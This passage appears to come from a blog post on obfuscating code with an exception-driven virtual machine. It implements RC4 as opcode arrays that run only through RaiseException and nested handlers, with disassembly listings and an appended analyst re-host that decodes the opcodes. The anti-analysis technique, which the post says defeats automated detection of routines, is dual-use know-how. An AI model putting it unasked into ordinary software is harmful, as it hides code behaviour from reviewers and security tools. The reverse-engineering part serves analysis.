BOOL chckopc_extr(BYTE opcode, BYTE opc, DWORD **op1, DWORD **op2, struct _EXCEPTION_POINTERS *ep)
{
    EXCEPTION_RECORD *er;
    if(opcode != opc) return false;
    er = ep->ExceptionRecord;
    *op1 = (DWORD*)(er->ExceptionInformation[0]);
    *op2 = (DWORD*)(er->ExceptionInformation[1]);
    return true;
}

// reads an operand given its type and size
DWORD readop(DWORD *op, BYTE type, BYTE size)
{
    switch(type)
    {
    case OP_V:
        if(size == OP_BYTE)
            return *((BYTE*)op);
        else
            return *op;
    case OP_C:
        return (DWORD)op;
    case OP_P:
        if(size == OP_BYTE)
            return *((BYTE*)(*op));
        else
            return *((DWORD*)(*op));
    }
    return 0;
}

// assigns data to an operand given its type and size
void assignop(DWORD *op, BYTE type, BYTE size, DWORD data)
{
    switch(type)
    {
    case OP_V:
        if(size == OP_BYTE)
            *((BYTE*)op) = (BYTE)data;
        else
            *op = data;
        break;
    case OP_C:
        *op = data;
        break;
    case OP_P:
        if(size == OP_BYTE)
            *((BYTE*)(*op)) = (BYTE)data;
        else
            *((DWORD*)(*op)) = data;
        break;
    }
}

// -----------------------------------------------------------------
// Opcodes

// x = x % y
int mod(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
    DWORD *op1, *op2;
    if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_MOD, &op1, &op2, ep))
        return false;
    *op1 = *op1 % *op2;
    return true;
}

// x = x ^ y
int xor(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
    DWORD *op1, *op2;
    if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_XOR, &op1, &op2, ep))
        return false;
    *op1 = *op1 ^ *op2;
    return true;
}

// unsigned compare
int cmp(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
    DWORD src1, src2;
    DWORD *op1, *op2;
    if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_CMP, &op1, &op2, ep))
        return false;
    src1 = readop(op1, ((OPCODE*)&code)->type_op1, ((OPCODE*)&code)->size);
    src2 = readop(op2, ((OPCODE*)&code)->type_op2, ((OPCODE*)&code)->size);
    if(src1 > src2)
        flags = GT;
    else if(src1 < src2)
        flags = LT;
    else
        flags = EQ;
    return true;
}

// eip = x IFF flags == LT
int jl(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
    DWORD *op1, *op2;
    if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_JL, &op1, &op2, ep))
        return false;
    if(flags == LT)
        eip = ((DWORD)op1 * 3) - 3; // EXC_RUN adds 3 afterwards
    return true;
}

// eip = x
int jmp(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
    DWORD *op1, *op2;
    if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_JMP, &op1, &op2, ep))
        return false;
    eip = ((DWORD)op1 * 3) - 3;
    return true;
}

// eip = EIP_HALT
int hlt(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
    DWORD *op1, *op2;
    if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_HLT, &op1, &op2, ep))
        return false;
    eip = EIP_HALT - 3;
    return true;
}

// move data
int mov(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
    DWORD src2;
    DWORD *op1, *op2;
    if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_MOV, &op1, &op2, ep))
        return false;
    src2 = readop(op2, ((OPCODE*)&code)->type_op2, ((OPCODE*)&code)->size);
    assignop(op1, ((OPCODE*)&code)->type_op1, ((OPCODE*)&code)->size, src2);
    return true;
}

// add data
int add(unsigned int code, struct _EXCEPTION_POINTERS *ep)
{
    DWORD src1, src2;
    DWORD *op1, *op2;
    if(!chckopc_extr((((OPCODE*)&code)->opcode), OPC_ADD, &op1, &op2, ep))
        return false;
    src1 = readop(op1, ((OPCODE*)&code)->type_op1, ((OPCODE*)&code)->size);
    src2 = readop(op2, ((OPCODE*)&code)->type_op2, ((OPCODE*)&code)->size);
    src2 += src1;
    assignop(op1, ((OPCODE*)&code)->type_op1, ((OPCODE*)&code)->size, src2);
    return true;
}

// -----------------------------------------------------------------
int main(void)
{
    // test vector:
    // ascii key 0123456789abcdef
    // hex plaintext: 0000000000000000
    // hex ciphertext: 7494c2e7104b0879
    BYTE *temp_perm, *temp_perm2, *temp_key, *temp_plain, *temp_cipher;
    BYTE perm_byte, swap_byte;
    DWORD j, index1, index2, key_index, key_byte;
    int i, keylen = 8, plainlen = 8;
    BYTE perm[256];
    BYTE key[8] = {0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef};
    BYTE plaintext[8] = {0, 0, 0, 0, 0, 0, 0, 0};
    BYTE ciphertext[8];
    temp_perm = perm;

    DWORD rc4_init_op[] = {
        /* 000 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &i, 0), // init permutation box
        /* 001 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm, &i),
        /* 002 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_DWORD, &temp_perm, 1),
        /* 003 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_DWORD, &i, 1),
        /* 004 */ MAKE_OPC(OPC_CMP, OP_V, OP_C, OP_DWORD, &i, 256),
        /* 005 */ MAKE_OPC(OPC_JL, 0, 0, 0, 1, 0),
        /* 006 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_BYTE, &index1, 0),
        /* 007 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_BYTE, &index2, 0),
        /* 008 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &j, 0), // apply the key to the permutation box
        /* 009 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &i, 0),
        /* 010 */ MAKE_OPC(OPC_MOV, OP_V, OP_V, OP_DWORD, &key_index, &i),
        /* 011 */ MAKE_OPC(OPC_MOD, 0, 0, 0, &key_index, &keylen),
        /* 012 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_key, key),
        /* 013 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_key, &key_index),
        /* 014 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &key_byte, &temp_key),
        /* 015 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
        /* 016 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &i),
        /* 017 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &perm_byte, &temp_perm),
        /* 018 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_BYTE, &j, &perm_byte),
        /* 019 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_BYTE, &j, &key_byte),
        /* 020 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm), // swap bytes
        /* 021 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &j),
        /* 022 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &swap_byte, &temp_perm),
        /* 023 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm, &perm_byte),
        /* 024 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
        /* 025 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &i),
        /* 026 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm, &swap_byte),
        /* 027 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_DWORD, &i, 1),
        /* 028 */ MAKE_OPC(OPC_CMP, OP_V, OP_C, OP_DWORD, &i, 256),
        /* 029 */ MAKE_OPC(OPC_JL, 0, 0, 0, 10, 0),
        /* 030 */ MAKE_OPC(OPC_HLT, 0, 0, 0, 0, 0)
    };

    DWORD rc4_crypt_op[] = {
        /* 000 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &i, 0),
        /* 001 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &index1, 0),
        /* 002 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &index2, 0),
        /* 003 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &j, 0),
        /* 004 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_BYTE, &index1, 1), // update indices
        /* 005 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
        /* 006 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &index1),
        /* 007 */ MAKE_OPC(OPC_ADD, OP_V, OP_P, OP_BYTE, &index2, &temp_perm),
        /* 008 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &swap_byte, &temp_perm), // swap bytes
        /* 009 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm2, perm),
        /* 010 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm2, &index2),
        /* 011 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &perm_byte, &temp_perm2),
        /* 012 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm2, &swap_byte),
        /* 013 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_perm, &perm_byte),
        /* 014 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm), // xor
        /* 015 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &index1),
        /* 016 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &j, &temp_perm),
        /* 017 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
        /* 018 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &index2),
        /* 019 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &perm_byte, &temp_perm),
        /* 020 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_BYTE, &j, &perm_byte),
        /* 021 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_plain, plaintext),
        /* 022 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_plain, &i),
        /* 023 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &perm_byte, &temp_plain),
        /* 024 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_perm, perm),
        /* 025 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_perm, &j),
        /* 026 */ MAKE_OPC(OPC_MOV, OP_V, OP_P, OP_BYTE, &swap_byte, &temp_perm),
        /* 027 */ MAKE_OPC(OPC_XOR, 0, 0, 0, &swap_byte, &perm_byte),
        /* 028 */ MAKE_OPC(OPC_MOV, OP_V, OP_C, OP_DWORD, &temp_cipher, ciphertext),
        /* 029 */ MAKE_OPC(OPC_ADD, OP_V, OP_V, OP_DWORD, &temp_cipher, &i),
        /* 030 */ MAKE_OPC(OPC_MOV, OP_P, OP_V, OP_BYTE, &temp_cipher, &swap_byte),
        /* 031 */ MAKE_OPC(OPC_ADD, OP_V, OP_C, OP_DWORD, &i, 1),
        /* 032 */ MAKE_OPC(OPC_CMP, OP_V, OP_V, OP_DWORD, &i, &plainlen),
        /* 033 */ MAKE_OPC(OPC_JL, 0, 0, 0, 4, 0),
        /* 034 */ MAKE_OPC(OPC_HLT, 0, 0, 0, 0, 0)
    };

    EXC_RUN(rc4_init_op);
    EXC_RUN(rc4_crypt_op);
    printf("cipher: %02X %02X %02X %02X %02X %02X %02X %02X\n",
           ciphertext[0], ciphertext[1], ciphertext[2], ciphertext[3],
           ciphertext[4], ciphertext[5], ciphertext[6], ciphertext[7]);
    return 0;
}
</code></pre>
</div>
<br />
<br />
<span style="font-family: Verdana, sans-serif;">Following this idea, you can easily implement any other algorithm, and this brings several advantages in terms of obfuscation. In fact, in order to understand the code, you have to analyze the array containing all the opcodes, which is generated dynamically (the compiler emits a series of stores to the stack frame rather than a static table):</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401678 mov [ebp+var_160], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:0040167E mov [ebp+var_15C], 1</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401688 mov [ebp+var_158], 2020113h</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401692 mov [ebp+var_154], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401698 mov [ebp+var_150], 100h</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016A2 mov [ebp+var_14C], 14h</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016AC mov [ebp+var_148], 0Ah</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016B6 xor ebx, ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016B8 mov [ebp+var_144], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016BE mov [ebp+var_140], 16h</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016C8 mov [ebp+var_13C], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016CE mov [ebp+var_138], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016D4 mov [ebp+var_44C], eax</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016DA lea ebx, [ebp+var_458]</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016E0 mov [ebp+var_448], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016E6 mov [ebp+var_444], 0</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016F0 mov [ebp+var_440], eax</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016F6 lea ebx, [ebp+var_464]</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:004016FC mov [ebp+var_43C], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401702 mov [ebp+var_438], 0</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:0040170C mov [ebp+var_434], eax</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401712 lea ebx, [ebp+var_460]</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401718 mov [ebp+var_430], ebx</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:0040171E mov [ebp+var_42C], 0</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<span style="font-family: Courier New, Courier, monospace;">.text:00401728 mov [ebp+var_428], eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">Moreover, the opcodes aren't referenced by any direct call, because they are executed only as a consequence of the "RaiseException" API, which is guarded by several nested try-except blocks. This results in a chain of filter expressions and except bodies (which constitute an additional layer above the opcode routines) that is triggered by the scopetable mechanism:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div class="p1">
<span style="color: purple; font-family: Courier New, Courier, monospace;">; while(eip != EIP_HALT)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401ACE loc_401ACE: ; CODE XREF: _main+A92 j</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401ACE mov dword_404370, eax</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401AD3 cmp eax, 0FFFFFFFFh</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401AD6 jz loc_401D87</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="color: purple; font-family: Courier New, Courier, monospace;">; this is the code guarded inside the nested try/excepts</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B11 lea edx, [ebp+eax*4+Arguments]</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B18 push edx ; lpArguments</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B19 push 2 ; nNumberOfArguments</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B1B push ecx ; dwExceptionFlags</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B1C mov eax, [ebp+eax*4+dwExceptionCode]</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B23 push eax ; dwExceptionCode</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B24 call ds:RaiseException</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B57 jmp loc_401D71</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="color: purple; font-family: Courier New, Courier, monospace;">; a couple of filter expressions and except bodies</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B5C loc_401B5C: ; DATA XREF: .rdata:00403290 o</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B5C mov eax, [ebp+var_14]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B5F mov ecx, [eax]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B61 mov edx, [ecx]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B63 mov [ebp+var_4F0], edx</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B69 call sub_401050</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6E retn</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6F ; ---------------------------------------------------------------------------</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6F</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6F loc_401B6F: ; DATA XREF: .rdata:00403294 o</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B6F mov esp, [ebp+var_18]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B72 mov [ebp+var_4], 6</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B79 mov [ebp+var_4], 5</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B80 mov [ebp+var_4], 4</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B87 mov [ebp+var_4], 3</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B8E mov [ebp+var_4], 2</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B95 mov [ebp+var_4], 1</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401B9C mov [ebp+var_4], 0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA3 jmp loc_401D71</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA8 ; ---------------------------------------------------------------------------</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA8</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA8 loc_401BA8: ; DATA XREF: .rdata:00403284 o</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BA8 mov eax, [ebp+var_14]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BAB mov edx, [eax]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BAD mov ecx, [edx]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BAF mov [ebp+var_4D4], ecx</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BB5 call sub_401170</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBA retn</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBB ; ---------------------------------------------------------------------------</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBB</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBB loc_401BBB: ; DATA XREF: .rdata:00403288 o</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBB mov esp, [ebp+var_18]</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BBE mov [ebp+var_4], 5</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BC5 mov [ebp+var_4], 4</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BCC mov [ebp+var_4], 3</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BD3 mov [ebp+var_4], 2</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BDA mov [ebp+var_4], 1</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BE1 mov [ebp+var_4], 0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401BE8 jmp loc_401D71</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="color: purple; font-family: Courier New, Courier, monospace;">; outside the nested try/except blocks there is the code that increases the virtual EIP</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401D71 loc_401D71: ; CODE XREF: _main+867 j</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">.text:00401D71 ; _main+8B3 j </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">As you can see, the algorithm is broken up into pieces, and it is not easy to figure out what the code is attempting to do, nor to automate the detection of specific routines.</span></div>
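<div class="p1">
<span style="font-family: Verdana, sans-serif;">An added example, not code from the post: once the opcode array has been recovered from those stack stores, the SEH plumbing is only a delivery mechanism, so an analyst can re-host the triples in a plain interpreter with the same mov/add/cmp/jl/jmp/mod/xor semantics and run the recovered program anywhere. The C code below does that and drives it with the first six triples of rc4_init_op; the MK macro, the word-sized operands (widened from DWORD so it builds on 64-bit hosts) and the expected step count are assumptions of this re-host, not the post's.</span></div>

```c
#include <stdint.h>
#include <stddef.h>

/* Opcode ids, operand kinds, sizes and cmp flags, exactly as the post's MAKE_OPC
 * packs them: packed = opc | (type_op1 << 8) | (type_op2 << 16) | (size << 24). */
enum { OPC_MOD = 0x11, OPC_XOR, OPC_CMP, OPC_JL, OPC_JMP, OPC_HLT, OPC_MOV, OPC_ADD };
enum { OP_V = 1, OP_C = 2, OP_P = 3 };
enum { OP_BYTE = 1, OP_DWORD = 2 };
enum { FL_GT = 0, FL_LT = 1, FL_EQ = 2 };

/* One MAKE_OPC triple. The post stores 32-bit DWORD operands; they are widened to
 * uintptr_t here so the re-host runs on a 64-bit little-endian host as well
 * (OP_DWORD therefore means "one machine word"). */
typedef struct { uintptr_t packed, op1, op2; } Instr;
typedef struct { uint8_t opc, t1, t2, sz; } Decoded;

/* Unpack the first word of a triple, e.g. the 2020113h seen in the listing above. */
Decoded decode(uintptr_t packed)
{
    Decoded d;
    d.opc = (uint8_t)(packed & 0xff);
    d.t1  = (uint8_t)((packed >> 8) & 0xff);
    d.t2  = (uint8_t)((packed >> 16) & 0xff);
    d.sz  = (uint8_t)((packed >> 24) & 0xff);
    return d;
}

/* Same operand semantics as the post's readop/assignop: OP_V is a variable's
 * address, OP_C the literal value, OP_P the address of a pointer to dereference. */
static uintptr_t readop(uintptr_t op, uint8_t type, uint8_t size)
{
    switch (type) {
    case OP_V: return size == OP_BYTE ? *(uint8_t *)op : *(uintptr_t *)op;
    case OP_C: return op;
    case OP_P: return size == OP_BYTE ? **(uint8_t **)op : **(uintptr_t **)op;
    }
    return 0;
}

static void assignop(uintptr_t op, uint8_t type, uint8_t size, uintptr_t v)
{
    if (type == OP_P) op = *(uintptr_t *)op;          /* one level of indirection */
    if (size == OP_BYTE) *(uint8_t *)op = (uint8_t)v;
    else                 *(uintptr_t *)op = v;
}

/* Portable re-host of EXC_RUN: walks the triples directly instead of raising one
 * exception per instruction. Jump targets are instruction indices (the post keeps
 * eip = index * 3). Returns the number of instructions executed, hlt included, or
 * -1 on an unknown opcode, an out-of-range ip or when max_steps is exhausted. */
long run_program(const Instr *prog, size_t n, long max_steps)
{
    size_t ip = 0;
    long steps = 0;
    int flags = FL_GT;
    for (;;) {
        if (ip >= n || steps >= max_steps) return -1;
        Decoded d = decode(prog[ip].packed);
        uintptr_t a = prog[ip].op1, b = prog[ip].op2;
        steps++;
        switch (d.opc) {
        case OPC_MOV: assignop(a, d.t1, d.sz, readop(b, d.t2, d.sz)); break;
        case OPC_ADD: assignop(a, d.t1, d.sz, readop(a, d.t1, d.sz) + readop(b, d.t2, d.sz)); break;
        case OPC_CMP: {
            uintptr_t x = readop(a, d.t1, d.sz), y = readop(b, d.t2, d.sz);
            flags = x > y ? FL_GT : (x < y ? FL_LT : FL_EQ);
            break;
        }
        case OPC_MOD: *(uintptr_t *)a %= *(uintptr_t *)b; break; /* raw word pointers, as in the post */
        case OPC_XOR: *(uintptr_t *)a ^= *(uintptr_t *)b; break;
        case OPC_JL:  if (flags == FL_LT) { ip = (size_t)a; continue; } break;
        case OPC_JMP: ip = (size_t)a; continue;
        case OPC_HLT: return steps;
        default:      return -1;
        }
        ip++;
    }
}

/* Hypothetical helper that builds a triple the way MAKE_OPC does. */
#define MK(opc, t1, t2, sz, p1, p2) \
    { (uintptr_t)((opc) | ((t1) << 8) | ((t2) << 16) | ((sz) << 24)), (uintptr_t)(p1), (uintptr_t)(p2) }

static uint8_t perm[256];
static uintptr_t i_var, temp_perm;

/* Triples 000-005 of the post's rc4_init_op (identity init of the permutation box)
 * plus a hlt, rebuilt against host variables. Returns 1 when perm[k] == k for every
 * k and exactly 1282 instructions ran (1 + 256 * 5 + hlt), 0 otherwise. */
int demo_init_loop(long *steps_out)
{
    Instr prog[] = {
        MK(OPC_MOV, OP_V, OP_C, OP_DWORD, &i_var, 0),          /* 000 */
        MK(OPC_MOV, OP_P, OP_V, OP_BYTE,  &temp_perm, &i_var), /* 001 */
        MK(OPC_ADD, OP_V, OP_C, OP_DWORD, &temp_perm, 1),      /* 002 */
        MK(OPC_ADD, OP_V, OP_C, OP_DWORD, &i_var, 1),          /* 003 */
        MK(OPC_CMP, OP_V, OP_C, OP_DWORD, &i_var, 256),        /* 004 */
        MK(OPC_JL,  0, 0, 0, 1, 0),                            /* 005 */
        MK(OPC_HLT, 0, 0, 0, 0, 0),                            /* 006 */
    };
    int k;
    temp_perm = (uintptr_t)perm;                 /* the post does temp_perm = perm; */
    for (k = 0; k < 256; k++) perm[k] = 0xAA;    /* poison so the writes are visible */
    long steps = run_program(prog, sizeof prog / sizeof prog[0], 10000);
    if (steps_out) *steps_out = steps;
    for (k = 0; k < 256; k++) if (perm[k] != k) return 0;
    return steps == 1282;
}
```

Decoding the stack stores in the listing above with the same layout gives add i,1; cmp i,256 (2020113h with operands ebx and 100h); jl 10 (14h, 0Ah); hlt (16h), i.e. triples 027 to 030 of rc4_init_op.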
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
</div>
